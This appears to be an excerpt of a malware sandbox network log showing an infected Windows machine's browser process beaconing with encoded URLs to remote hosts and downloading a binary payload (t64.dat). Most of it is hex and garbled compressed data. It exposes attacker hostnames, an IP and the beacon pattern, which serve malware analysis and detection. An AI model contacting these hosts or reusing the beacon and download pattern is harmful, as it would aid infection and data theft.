Feb 12, 2021 09:59:56.434792995 CET	1641	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 08:59:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a c5 72 83 00 14 45 3f 88 05 6e 4b dc 09 6e 3b 9c e0 6e 5f df 74 d5 e9 4c 93 20 ef dd 7b 0e cd cc 0f 5f 06 7e fb d8 10 de 4f 69 07 c3 d5 00 89 c2 b4 6d 37 82 82 ba 3d f3 f6 69 65 1a 06 de fd 31 bc 33 4a cc 6a 01 bf 45 35 0a 23 a5 1b 20 4d 23 c4 4a 83 51 23 c8 15 38 97 d9 27 48 98 14 df 55 a4 d1 68 29 14 99 8d 43 af f8 c3 92 80 ff 71 9e 23 0e 24 e9 95 59 99 8e 6b 02 6c 83 ad ef 98 53 f4 fc ba 83 d3 57 24 e3 34 b1 20 e0 3d b4 07 3e 8c 40 1d 2f fe 4c 0a 24 91 f8 88 d3 74 7d 27 7a 88 0d 6a f3 95 3f 96 16 04 75 9c 20 5e 0f 3c c9 8e be c9 1d eb b6 c1 0b 45 a3 03 95 7f dd 26 bf e1 78 a4 8b a1 5c 4f 4c 2e ea 4d 2b 24 34 ea 82 30 05 87 36 ac ab 3a f4 92 49 45 14 91 55 37 6d 78 59 a3 75 09 f9 d8 1b 82 0b 81 e7 3d 9f 67 b3 b5 5e 5b 40 ca 92 b3 61 da ee 52 d0 51 73 02 7b 8c 88 f1 3a 3f b8 95 5c b5 5d fc 44 71 d3 34 85 75 56 89 95 df 91 5e 0b 89 5a 35 75 34 2f a9 18 dc 08 a4 57 9c ba f5 b0 90 3d b8 9d 94 69 95 de 6b 3e ae e9 87 c6 2b 74 cd 28 06 48 a5 d0 98 48 14 68 40 5b 64 e1 cf d9 e0 ca 1a 65 fc 72 7b 52 e3 87 76 f3 e9 2a 25 a0 19 b4 13 a4 ba e0 59 f5 db 6c 35 00 89 87 f2 a9 d8 6e 03 65 c3 1b a4 72 b7 e4 a2 b2 59 f0 aa 61 8e 73 50 30 c2 4c 53 e0 3d ab a1 26 4a c7 c5 b7 bc 15 38 f9 d6 a8 dd 3d e3 74 e3 bc 76 20 b9 c1 a2 53 91 bb c7 11 34 df 43 55 8b 9e b2 d1 b8 23 4d 08 ea 83 08 a1 5f 26 04 aa da e3 b9 8a 1a cc 9d 94 77 65 f4 42 7b cf 34 a3 5c 37 ef 0b 04 27 7c f4 ce 6b fb 33 44 ca 32 ca 8b 1e 53 65 11 15 3b e7 85 11 7b 8a 84 58 d3 06 74 bc 5f 65 50 2c a9 6c cd 9c 54 b8 ae f0 c1 59 a9 6b f1 91 07 d3 82 20 d5 4a 3c 56 9c fd dd b1 e7 29 73 02 23 88 cc 67 06 af ad da 9d 84 a8 fc e8 7b 86 9b 3a b5 db 77 bc d9 9a 22 d7 4a c2 39 be d2 e7 ed 2a 78 64 b1 58 b4 39 26 d9 88 ba eb 48 72 fc 76 c1 b8 2b a2 04 8f b9 9f ee 26 c2 7d 50 41 c2 c9 88 87 f6 f3 6a af 9c 9c 51 dd dd cb db 27 8a 7e 13 23 05 a6 b1 e7 7b df 19 75 83 f7 cd 44 1d 69 8c 6f 4d 86 98 99 f5 4c 50 1b 17 64 65 90 9f ea fe 50 0e d9 92 67 6c bf 7a 1e 9b a6 01 b0 92 e6 d7 72 ab 1d 74 6e 70 85 3b e1 fa d8 66 c0 a4 53 4a d8 b2 32 a6 8a c9 5f 1b e1 df 98 43 04 a6 2f b3 aa 2c e8 e7 3e b7 6b 0a 00 37 f3 91 35 e6 09 c0 b9 49 0e 6c 02 0b b9 75 07 e3 54 10 d7 48 76 7f 26 a7 e0 34 ed 74 bd 9f 78 07 f3 01 90 68 7c 1b fb 50 04 3f 4b cb 2e ec dc a8 00 a9 dd d8 74 57 3c 8a 7a 31 bd ed 89 9e a8 97 f6 d9 a0 f2 41 f2 78 db 31 25 fe 12 e2 15 97 2d 30 e8 2d b4 91 23 61 44 37 8a fe ce e3 54 09 4f 34 40 d3 86 de fd 6c 65 67 ee 4f 5e 01 73 85 54 1b 45 c2 62 ac 47 33 d8 de 66 66 2f 28 12 4e 33 6a ef 14 36 8f 75 23 0c e6 0d 34 16 31 df 2f a9 d8 18 8b 4c 7e 17 aa b5 46 bc 72 26 3b 65 e7 f7 99 28 08 f7 e3 42 52 38 19 aa f4 2d e9 d9 26 de c4 7b 18 2b 6b 69 92 95 95 d2 3c e4 74 84 0f 51 d8 9b 95 80 55 57 87 c4 64 50 16 d6 46 99 48 41 32 44 f3 ca 5b cb 95 55 f4 f0 ca 18 cd c7 62 f9 2a 5d 2d ed a5 34 b4 bb b9 42 1d cf a8 b9 38 60 61 4c 3c 46 19 6a df e1 4c 46 b1 d8 cd 6b 49 bf 7b 03 dc c8 b3 97 df dd a6 9a 02 0c 94 4e 4b 84 4c 20 f0 3c 60 f8 1c b8 16 68 4a 36 36 9a 2e 4f b8 65 0a f3 10 7d 6b 50 b3 0f 79 7e a0 ef e2 e2 09 ea 77 2a 7b b2 20 3e d7 7b f6 ef 60 29 1b 93 27 da cd c9 3e b2 c6 cd 31 Data Ascii: 2000rE?nKn;n_tL {_~Oim7=ie13JjE5# M#JQ#8'HUh)Cq#$YklSW$4 =>@/L$t}'zj?u ^<E&x\OL.M+$406:IEU7mxYu=g^[@aRQs{:?\]Dq4uV^Z5u4/W=ik>+t(HHh@[der{Rv%Yl5nerYasP0LS=&J8=tv S4CU#M_&weB{4\7'\|k3D2Se;{Xt_eP,lTYk J<V)s#g{:w"J9xdX9&Hrv+&}PAjQ'~#{uDioMLPdePglzrtnp;fSJ2_C/,>k75IluTHv&4txh\|P?K.tW<z1Ax1%-0-#aD7TO4@legO^sTEbG3ff/(N3j6u#41/L~Fr&;e(BR8-&{+ki<tQUWdPFHA2D[Ub]-4B8`aL<FjLFkI{NKL <`hJ66.Oe}kPy~w{ >{`)'>1
Feb 12, 2021 09:59:56.434823036 CET	1642	IN	Data Raw: 21 e9 96 d6 ef 35 d6 75 51 6b 59 82 2a f7 20 d0 22 b5 c3 23 2f ea 1f 53 99 8c ea 9a e3 42 3f d7 4c 12 35 2f 9c 72 e4 24 01 a5 fa 0e 9f 25 9c a4 53 2c f8 91 dd 9e 12 1f ac f2 52 be a0 3e aa f0 f3 75 b2 40 72 98 b8 f9 ba 58 3e 3f 4e 8b c1 6a 5f 4e Data Ascii: !5uQkY* "#/SB?L5/r$%S,R>u@rX>?Nj_N4)phL1KQ[B1CR4Ht\|>G6_Or`I#Ow{wB2XA_\|jm<?{$\n_"%+=`3302~Q.fUQw<lvB0F{
Feb 12, 2021 09:59:56.434843063 CET	1643	IN	Data Raw: a6 33 b0 eb 4a e0 57 00 d0 5a 26 c9 be ee 69 52 3b 22 bb fe b2 e7 aa 8f 0a 37 d3 38 fb f4 55 b2 92 9a 1c db 9f 75 fc 12 96 b5 f8 8e 73 ed 26 d1 e8 f7 67 92 31 b3 25 bc 75 d8 16 27 81 1a e3 1d 29 25 1c 9f 68 4d 0d d8 26 25 4d e0 81 65 b3 27 c1 69 Data Ascii: 3JWZ&iR;"78Uus&g1%u')%hM&%Me'igR/tL=/z;"#^;YcZhOC"xI/yx$M,-Rb02@Hg4:,}'.>FOdpZk5>X;{@?M+Q?'\|P;s%/zz
Feb 12, 2021 09:59:56.434866905 CET	1645	IN	Data Raw: a4 4f a4 55 7a b7 84 9a 2a ac cd 84 fc 67 ef 29 bf 9c f8 64 08 29 e2 62 fe 5b cf 24 ad 11 a3 19 73 5e fa 61 85 18 1c 9f fa 10 0c 98 d8 2f cb 4d 89 2b 93 d1 50 4e 10 84 16 59 97 c2 b6 2d b5 95 ec b8 02 a2 ae e8 0f 75 8c 1d 9f de 7b 50 ae 87 1a 25 Data Ascii: OUzg)d)b[$s^a/M+PNY-u{P%bS<A,czt54mjM'~HK3 r,SfK85)\|?.2yo28Y[>6d. <O;N[.>f@~bG,w5g'y
Feb 12, 2021 09:59:56.434901953 CET	1646	IN	Data Raw: 26 7e 54 f2 1d b4 59 55 5e 6a 58 fc 88 0e 0d e7 67 a0 3b 77 49 6d e2 11 30 0b 0f c2 6c d1 19 82 62 e2 11 0e 8c cd 02 f4 ca 87 bd 4f f3 9b 77 69 f1 a8 e1 23 72 4e bc a4 48 09 8d 9c 96 92 33 00 da d4 8d 7f 52 e4 57 83 9a 90 fa fc 3a d4 b1 81 0b 7d Data Ascii: &~TYU^jXg;wIm0lbOwi#rNH3RW:}T] f9cbOOw(i%rRdCblIV.kJ:^'F]3?,"*?&>`7LRc1U'^SX@JZ-@M>y4dQ
Feb 12, 2021 09:59:56.434925079 CET	1647	IN	Data Raw: e1 ad 12 e6 c7 b7 f1 3b 0a fc 00 07 df d2 e8 df 96 70 71 50 ad 26 69 fc fc 0c e9 38 ab 61 92 95 ef b7 e9 f8 da 83 08 f3 5e da 46 85 04 d0 b1 5c 09 c3 8e 83 fa 09 b0 41 82 64 65 e7 19 8f f9 b1 8b b5 71 7e 3a 7e 8b b8 d0 c2 3c a2 99 f0 1c bb 47 f6 Data Ascii: ;pqP&i8a^F\Adeq~:~<GNPS5t_xuR8#U?`mbIlI;w_[1x-;EMeDsX<R:9MZbSg7l{j#jxgccu\|Ofjn,*r_Tl4H3 (6YT0z
Feb 12, 2021 09:59:56.474822998 CET	1649	IN	Data Raw: cc de 23 7f 67 19 b6 a2 c3 51 19 eb 99 05 97 1e 7c 29 3c 80 7f 94 09 1d 3d 81 68 d3 4d 0e c5 b4 0f 12 8f 35 fa 55 da b3 2e 90 e5 3e 31 50 dd 60 4a fd 04 1c aa 52 22 f9 fd 58 9b 3a 20 31 78 cf 45 ba 93 c9 0c 85 6d e4 13 54 4a 93 f7 b8 f1 af f9 85 Data Ascii: #gQ\|)<=hM5U.>1P`JR"X: 1xEmTJ:0&5M5cC( t! CB_C~zd?o8PazmKSY5Tn>nsiv?Q!S<OR/U9KO>e1Rm@q(
Feb 12, 2021 09:59:56.474850893 CET	1650	IN	Data Raw: cb 3d 07 f2 98 ae 2f 9a e5 2e 74 d2 5a 66 00 1a 52 83 b9 6a e6 74 c2 04 1d 1b 0a d5 46 10 27 ea 0f d5 7b 52 ab fb 77 4f 7c 69 0a 82 4e 2a 36 45 1a 49 24 c8 73 f1 54 fc 44 98 e5 90 8c 35 42 70 e5 b1 b0 5f 46 fa 45 c4 f2 2d ae 97 df 99 ca eb 2a e7 Data Ascii: =/.tZfRjtF'{RwO\|iN6EI$sTD5Bp_FE-QA]ssq"~<'M[ySE1RfDz~m>/Bdh$512W+83B)dMks7\|"3/EnG\5wm#r"
Feb 12, 2021 09:59:56.474867105 CET	1651	IN	Data Raw: 30 4c 60 b9 0d 66 39 5b 03 db 38 aa d5 fd 32 c8 8f d5 dd 22 3e 03 aa ce 95 df 69 4f 2a ed cc c7 da b0 99 4a 31 09 c2 b7 ba 01 2e 72 99 8b b6 04 f9 01 fb 16 9c 2e 62 2d d5 fe a2 32 f4 88 f8 1b fb e9 6d 62 5f f0 4e 29 f9 07 db 54 87 6c 20 fc 29 a5 Data Ascii: 0L`f9[82">iOJ1.r.b-2mb_N)Tl )yJmfG"S'h4b{Ax>\]]-g:,.hDiqYazUq\MRJ\|8<lH{S\*7hic3LfQMThKfg>l!knOm
Feb 12, 2021 09:59:56.474884033 CET	1653	IN	Data Raw: b9 0f 61 0d 14 ab 9c 06 67 5d ae 80 56 79 cf a2 75 66 39 d7 f3 8b ff c2 0f 55 1b d4 8f 55 4a 80 94 a3 7d fa 16 22 8f 5d 7b d4 28 c7 83 fd bc 92 dd c0 cf 0b 0e 1f 07 46 85 e9 fc d4 ef 34 47 88 fe 38 3a d6 42 5a 62 9c 04 ec 94 7e d1 60 d3 70 db ac Data Ascii: ag]Vyuf9UUJ}"]{(F4G8:BZb~`p\(^N*!INPT,p.o6\|N#'Y3`}{w3J:Ay1>B#j!cm4Y#+P\mlfC)+~,T {Y2
Feb 12, 2021 09:59:56.515726089 CET	1654	IN	Data Raw: 57 8f b6 c8 f1 cb 1b 72 33 6f fb 57 93 7d f3 c7 90 59 b8 05 75 14 00 df 37 6f 35 9d 51 43 2c d0 e5 f6 73 b7 94 bc bc d8 d1 07 3f a1 82 93 9f dd ab ce 5d da dd 83 60 52 6a 9c bf fc f9 3c 62 03 0a a3 6d 88 05 9d cb 97 76 5f 8c 05 55 86 56 6e c4 01 Data Ascii: Wr3oW}Yu7o5QC,s?]`Rj<bmv_UVn`p-D_t[35]5Tg?jn5e2tk%!ndaY$vt:\#&VX-2cE?{acpT59Pp &_x! H>v6!;L2q-vF

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49743	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 09:59:57.129642010 CET	1853	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Feb 12, 2021 09:59:57.222628117 CET	1854	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 12 Feb 2021 08:59:57 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.6	49762	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 10:00:48.832573891 CET	6713	OUT	GET /api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFoQNH/s8j31toeM/WHQs0DfRjGaPCW6Sk_2F/P21C2qJ3xd8l4QW1_2F/_2BCijsFomil85BW5tjyOE/vC4SLWVsudj9d/6p03Rh40/Oja1RIlTt_2F7DIg_2BdfV_/2F8i4PYPiF/iz_2FhrCPH_2B_2BQ/XXMADzrcnZWI/Hfv_2Bg59ad/cN7apglT0lQ7sQ/gNChqsZOPXttxVF41ze7_/2BkKWJ0wITm6Vd4A/wCJ1rQ02kuFRKOd/FLdCUCore_2F0Msy7C/S_2BUR4fF/nA78eeAv6Ywkiob/VeCW9pRE HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: golang.feel500.at Connection: Keep-Alive
Feb 12, 2021 10:00:49.241118908 CET	6715	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 09:00:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 15 95 35 a2 ad 08 00 43 17 44 81 5b 31 05 ee ee 74 b8 cb c5 61 f5 ff cd 16 92 9c 93 1c 48 64 20 dd 5e 16 ff a5 a1 4b 30 43 47 aa 7c a6 a7 61 84 d1 3b 34 c5 c4 26 8a 9a 7a ca 2e 6c 58 85 12 8f 42 38 40 9d cf 47 f0 db de a2 cd 77 f5 1d 41 dd 79 48 03 7d 56 34 9b 5f bd 8e ad 0e c0 36 70 45 ef f6 da cc 66 a6 32 f8 4f 33 86 e0 ad 94 08 f6 3a a1 d7 5c aa 32 04 33 60 e2 f8 7d 38 05 ae 61 1b 04 b7 e4 03 0c b3 a6 40 a0 a6 15 20 51 88 65 1e ce 6b 48 8c 77 5d 68 37 ec 7b 43 83 3b 39 b1 89 93 b7 61 94 fe 3a 2a b2 d2 46 71 1c e3 89 11 90 a6 7e ae b3 25 b8 25 4e a0 e4 67 0b 87 19 27 9c ef 22 1d 81 56 ae cf cd ae 65 a6 9a 1d 96 64 7f 74 87 c3 3e 29 03 90 c2 79 cb 13 9b 84 fc 62 33 e0 00 5c 30 a0 58 a9 9b 29 45 e3 22 ec 15 bf 7a e3 70 0d 4d e7 e4 1a 31 4d 39 47 4a 65 05 c1 a0 7d da b3 9d e7 cb cd ca fd c1 af e2 2b eb fd 78 a0 b8 fa 42 17 dc f9 1c 7a a3 71 b0 c3 7a d9 e0 21 06 a4 de 8e a3 e3 c9 99 e6 31 e5 07 6a 5f 3a ee f4 e3 5e 2b ee 31 98 23 f2 13 73 43 32 b1 b5 9e 2c 14 8b d5 21 23 5b a7 9e fd d0 ad 95 7a 7c 57 c4 24 c5 65 18 0d 13 bc 5d eb d4 b2 ea e3 ed 11 5a f1 eb 35 e2 e4 54 6e af df b0 e2 ba b3 25 ed 03 68 65 f2 71 d6 92 ad 4d ca 59 dc 27 59 4a 3f 9b a4 b2 51 7b 91 c4 00 7e 51 77 78 1e c0 33 85 07 b6 2a 84 49 dd cb 3b b9 5e b4 31 b7 44 d9 ae f3 d6 61 32 a0 4d 10 7c 78 e9 87 3e df e4 ca df 14 62 31 3a 5a 79 13 ab 23 37 73 ca 66 7f 8e 87 da c7 6d d9 ac cd b1 84 ba d1 aa 50 03 2c 75 44 15 6d 17 ed 96 08 f9 55 1d 78 54 13 7c c1 98 a9 f0 ec 23 9a ea b0 cf f1 e8 48 12 be 6f 2b 79 93 e1 82 f8 71 41 c5 6c 80 67 3c a9 a7 c9 cd 5f 7c 86 d1 a0 3b bf 43 f3 26 b0 20 6f 68 09 fb 17 16 bb 28 56 97 60 a3 53 2d 8b 1d 78 bf 8a 8d 47 c4 1a bf d9 6d 25 ea b8 bb d8 b3 db 50 52 dd 1b a0 a3 fc 6c a9 b4 03 dd 9c d6 d2 e3 95 70 db e4 bb 76 9c 1d ac bd af 2d 81 e7 9a 8c 18 86 b3 38 da 32 38 ca c1 9e 4c b0 a4 49 70 a1 44 8b dd 5b c1 0a 44 04 c9 87 e5 47 8a 65 9d 9b 42 a4 9d 77 0c bc 88 30 4a 29 24 b3 ff 9d 55 fe c9 c5 18 3a 62 ae cc 1b c8 13 c2 58 06 ed 13 5d 6b 58 45 13 7b 93 30 b3 ef 6f 21 ae 7a ea c2 02 af d0 4e ce f4 da 77 19 92 01 97 2b 95 11 df 33 82 d3 98 d7 1b 15 bb 3a 4f 35 07 0d 61 59 9e 11 7f 63 c2 c8 33 bc ee 4b 2b 7d 35 16 ae e8 98 f8 c8 73 8c 8c 36 4b be 3e 4c b7 bf d5 a4 fa 51 37 ad 2b c6 84 17 32 14 3e 14 09 0a cc 55 5a 9b 5b 87 5f 6f 53 ec cb ff 7c 93 79 8e a8 17 d2 9c 81 a6 14 4e 36 57 7a ad 28 17 54 e3 00 2e 07 98 15 08 7f c4 93 e0 e8 28 2b 83 32 f8 0e 1d cb 11 47 5f 2e e4 9e a8 15 11 94 5c d4 46 2c e9 bf ee 21 33 3a e8 62 59 e3 0c 36 16 13 09 cb 12 c5 05 ab 5d 06 2f 25 8a 26 54 a3 7d 35 e0 92 76 af 00 cb 97 b9 9b a2 39 e5 87 7a 8a 8c e7 b2 d1 a1 f9 78 11 06 19 77 82 79 d7 f8 c0 10 c0 de 51 80 1e 65 4c 35 52 f4 4f ca 34 01 9f 27 d5 e4 e0 e8 af d1 72 8c 20 e6 15 c0 63 e7 a9 14 b2 57 26 92 d8 aa a3 c7 d2 26 0d 1f 9f c9 f4 26 03 63 43 68 d9 26 fb 66 ea 6a 7e 72 f7 c2 e3 44 fb 34 ec ae 68 42 e0 a9 13 af 44 aa d5 22 8e a1 f3 db cc 82 f2 36 91 cc 4b 51 dd fe 23 a0 df 8a d7 93 bc 50 a8 c0 a6 6f 49 49 13 39 79 b0 f2 42 d5 97 f3 51 84 86 ac 10 cf c0 90 b6 16 73 40 a1 ea 02 b9 47 8a b4 58 0f fa 2f b0 d7 68 67 c2 5c de 63 e4 8b 98 28 Data Ascii: 7565CD[1taHd ^K0CG\|a;4&z.lXB8@GwAyH}V4_6pEf2O3:\23`}8a@ QekHw]h7{C;9a:Fq~%%Ng'"Vedt>)yb3\0X)E"zpM1M9GJe}+xBzqz!1j_:^+1#sC2,!#[z\|W$e]Z5Tn%heqMY'YJ?Q{~Qwx3I;^1Da2M\|x>b1:Zy#7sfmP,uDmUxT\|#Ho+yqAlg<_\|;C& oh(V`S-xGm%PRlpv-828LIpD[DGeBw0J)$U:bX]kXE{0o!zNw+3:O5aYc3K+}5s6K>LQ7+2>UZ[_oS\|yN6Wz(T.(+2G_.\F,!3:bY6]/%&T}5v9zxwyQeL5RO4'r cW&&&cCh&fj~rD4hBD"6KQ#PoII9yBQs@GX/hg\c(
Feb 12, 2021 10:00:49.241147041 CET	6716	IN	Data Raw: 25 57 ac c0 ef 4f 05 04 9a 93 1a 53 38 d8 7e 88 55 42 d6 26 c2 21 19 29 d0 18 02 f7 b3 eb c9 34 5f ed cd 82 de 97 53 17 c6 94 9e 79 59 de 1c cc 44 be a4 b9 bb 63 6b fe 20 fa 53 0f ba 1a 26 45 a3 b3 dd b1 4e b4 dc 67 b2 02 0d dc fb 4d 19 48 cb 79 Data Ascii: %WOS8~UB&!)4_SyYDck S&ENgMHy2{"I/]HTk{wbL*\c.:?PyJ&(H~q>gUAnCaGONfV\|YXf]c.4bH:W,~ykl)\|).RKTiUa>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.6	49765	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 10:01:19.153654099 CET	6726	OUT	GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: c56.lepini.at
Feb 12, 2021 10:01:19.245007038 CET	6728	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 09:01:19 GMT Content-Type: application/octet-stream Content-Length: 138820 Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT Connection: close ETag: "5db6b84e-21e44" Accept-Ranges: bytes Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1 Data Ascii: E~r[f1pwC\|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E_v[R{MMpq9.8G^j\<A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]\|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2\|;GHf.?I63L@+YsX'1mcp{_gTyB!n#TCJw.m!@4db\|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaXSw^BNg'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`\|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI
